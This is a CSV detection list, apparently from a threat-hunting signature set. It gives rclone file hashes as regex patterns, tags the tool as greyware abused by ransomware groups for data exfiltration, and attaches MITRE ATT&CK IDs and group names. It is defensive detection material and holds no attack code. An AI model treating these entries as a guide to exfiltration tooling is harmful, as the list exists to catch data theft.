"*24edac89937dfd5f8c945fe93d491505868d26280d2c70f8c071279b12174123*",".{0,1000}24edac89937dfd5f8c945fe93d491505868d26280d2c70f8c071279b12174123.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2501494de128471883b5cab25a9ae6a292c118d0fee725dd853d8c1335411781*",".{0,1000}2501494de128471883b5cab25a9ae6a292c118d0fee725dd853d8c1335411781.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*252ac98bb095787764fb981b61eb453c13717e7b2fc1e6275fdfacdc9ff1cbf2*",".{0,1000}252ac98bb095787764fb981b61eb453c13717e7b2fc1e6275fdfacdc9ff1cbf2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2547c89d62cac68c8dd271cf1d2e41b1d20a9ade7e25586a28a282444724a249*",".{0,1000}2547c89d62cac68c8dd271cf1d2e41b1d20a9ade7e25586a28a282444724a249.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*254d1221d682772e110fac89f96958aa8c8fe830474a672b84048ce1339f8620*",".{0,1000}254d1221d682772e110fac89f96958aa8c8fe830474a672b84048ce1339f8620.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2574d320cc107047490a5e3432c84c4de4b0d9da70f6d4aaa48a80a40b99bc99*",".{0,1000}2574d320cc107047490a5e3432c84c4de4b0d9da70f6d4aaa48a80a40b99bc99.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*258b3c1b649e03f58d2c099031014ab8bbef7e3af7bc63cdf3d20d0085025a6d*",".{0,1000}258b3c1b649e03f58d2c099031014ab8bbef7e3af7bc63cdf3d20d0085025a6d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*25da7fc5c9269b3897f27b0d946919df595c6dda1b127085fda0fe32aa59d29d*",".{0,1000}25da7fc5c9269b3897f27b0d946919df595c6dda1b127085fda0fe32aa59d29d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2601f8004cb6dda784d4f70fdf9c00d65172640199599416ae266c2977095c2c*",".{0,1000}2601f8004cb6dda784d4f70fdf9c00d65172640199599416ae266c2977095c2c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2680466b47990133f0b027e2aabb9febf182dccc7d9ee4b8d3bd2c269d90b846*",".{0,1000}2680466b47990133f0b027e2aabb9febf182dccc7d9ee4b8d3bd2c269d90b846.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2680ff90db43500e97f1ed688ed181cdbc68a46cbaa5dba1b89425463a3a799e*",".{0,1000}2680ff90db43500e97f1ed688ed181cdbc68a46cbaa5dba1b89425463a3a799e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*26c05dc5ac0adf3089e93cbd32107eec6bad9393ade5fb2eca16c45dfb9e470a*",".{0,1000}26c05dc5ac0adf3089e93cbd32107eec6bad9393ade5fb2eca16c45dfb9e470a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*26c7897855af56fb122a0aee9b6854033db315c3235d559ff06e8071acdfc415*",".{0,1000}26c7897855af56fb122a0aee9b6854033db315c3235d559ff06e8071acdfc415.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*273bae67f00d98e35f0ae1680307a5daf0bc4c1e3cb489ff2b7a46d54e2f53a3*",".{0,1000}273bae67f00d98e35f0ae1680307a5daf0bc4c1e3cb489ff2b7a46d54e2f53a3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*275c6b94849c1dc71f0cc30458339dbef40425657a28cda057074dc5d9105823*",".{0,1000}275c6b94849c1dc71f0cc30458339dbef40425657a28cda057074dc5d9105823.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*277f4ea11b12862715088dec3890ed9b54190d7f7f6614652ab87daeff4c4cd7*",".{0,1000}277f4ea11b12862715088dec3890ed9b54190d7f7f6614652ab87daeff4c4cd7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2782da062a67ebf7e34e50c839dead0be150295484d4e408e06e8498f1d5c818*",".{0,1000}2782da062a67ebf7e34e50c839dead0be150295484d4e408e06e8498f1d5c818.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*27ab19246f4b8686e96698d8412174e75ad957781e0c6b6ffb49680d26b440f3*",".{0,1000}27ab19246f4b8686e96698d8412174e75ad957781e0c6b6ffb49680d26b440f3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*27ba0db8c304b4135bc1398f90e5c975ba4f62aeb148e544a4c1a563dce5ef0b*",".{0,1000}27ba0db8c304b4135bc1398f90e5c975ba4f62aeb148e544a4c1a563dce5ef0b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*27c034a6397d29d882e8d6339d6dab65abda6c28a5f1b43babc05bd67f5cb8d6*",".{0,1000}27c034a6397d29d882e8d6339d6dab65abda6c28a5f1b43babc05bd67f5cb8d6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*27f2630140201c66ce90182677f6fd305a33baa304034fd47e5f4b78ea66123f*",".{0,1000}27f2630140201c66ce90182677f6fd305a33baa304034fd47e5f4b78ea66123f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*27f59f2bcc5b8938d0c3d2d080e15ee67ce8c9a44147b52da52d1183afdd8ce7*",".{0,1000}27f59f2bcc5b8938d0c3d2d080e15ee67ce8c9a44147b52da52d1183afdd8ce7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*27f98f852adcf7b03f7a0802cd61d3a6410adf16946bc406c3ac8d586cfec7cb*",".{0,1000}27f98f852adcf7b03f7a0802cd61d3a6410adf16946bc406c3ac8d586cfec7cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*281629712ccd9fdb0fceff799ddf2dd64e5eb154ef52d9ef145fc4a765800374*",".{0,1000}281629712ccd9fdb0fceff799ddf2dd64e5eb154ef52d9ef145fc4a765800374.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*286a7037bf3d357e80c5535e726e89cc6d157f449762228c6bbf79410eb9431b*",".{0,1000}286a7037bf3d357e80c5535e726e89cc6d157f449762228c6bbf79410eb9431b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*28b8907df12cb866c627f7dd3a692326e073384ceb5e99328007941026bb73b8*",".{0,1000}28b8907df12cb866c627f7dd3a692326e073384ceb5e99328007941026bb73b8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*28db376098fd00a050c065ffbbfc5e4d878cea412ce4b3dbc3c45c5c96dfee4f*",".{0,1000}28db376098fd00a050c065ffbbfc5e4d878cea412ce4b3dbc3c45c5c96dfee4f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*28f49a724fc8017ef9255fc720eaf31a58d77acd8f86466ab185c833294cc7bf*",".{0,1000}28f49a724fc8017ef9255fc720eaf31a58d77acd8f86466ab185c833294cc7bf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*290747f485b0a88e1d2b5d97eefcb63625b068724b0b76204be7223321ffae2d*",".{0,1000}290747f485b0a88e1d2b5d97eefcb63625b068724b0b76204be7223321ffae2d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2936b4e711e8becd5535dcab878af7c30479f81e16292b6e044b0f0b8cd945b6*",".{0,1000}2936b4e711e8becd5535dcab878af7c30479f81e16292b6e044b0f0b8cd945b6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2939e97fe8966ded6f0f9962071dde0c2116972dbfdfb778a18b8879ff944df8*",".{0,1000}2939e97fe8966ded6f0f9962071dde0c2116972dbfdfb778a18b8879ff944df8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*298f130b43988ad5a32abb7b59c45387adfc221ce675f98e367caa917dd5c1ff*",".{0,1000}298f130b43988ad5a32abb7b59c45387adfc221ce675f98e367caa917dd5c1ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*29b98f2475d297bbf04c80cf85182968b061aba8f326074c5d20af735eb9475d*",".{0,1000}29b98f2475d297bbf04c80cf85182968b061aba8f326074c5d20af735eb9475d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2a04a254f60255c10998f74be9d320740df82525a7d16d8ceebab57627137b44*",".{0,1000}2a04a254f60255c10998f74be9d320740df82525a7d16d8ceebab57627137b44.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2a447f956591e96269715dd5e27ec36cb1cabe61d45de5ee590b43adae67ce5f*",".{0,1000}2a447f956591e96269715dd5e27ec36cb1cabe61d45de5ee590b43adae67ce5f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2a62cd957adb970baa5fd244856516952c33194ae336a49f9b6727561cc48928*",".{0,1000}2a62cd957adb970baa5fd244856516952c33194ae336a49f9b6727561cc48928.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
